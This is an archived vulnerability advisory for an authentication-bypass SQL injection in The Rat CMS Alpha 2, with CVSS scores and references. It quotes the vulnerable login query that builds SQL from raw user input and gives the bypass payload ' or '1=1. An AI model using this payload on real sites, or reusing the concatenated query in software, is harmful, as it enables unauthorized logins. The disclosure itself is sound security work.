The Rat Cms Alpha 2 (Auth Bypass) SQL Injection Vulnerability

2009.08.24
Credit: x0r
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--------------------------------- The Rat Cms Auth By Pass --------------------------------- Autore: x0r Email: andry2000@hotmail.it -------------------------------- Bug In: \login.php $sql = "SELECT user_id FROM tbl_auth_user WHERE user_id = '$userId' AND user_password = PASSWORD('$password')"; $result = mysql_query($sql) or die('Query failed. ' . mysql_error()); Exploit: ' or '1=1 ^^ Got Root?

References:

http://xforce.iss.net/xforce/xfdb/47335
http://www.securityfocus.com/bid/32845
http://www.milw0rm.com/exploits/7478


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top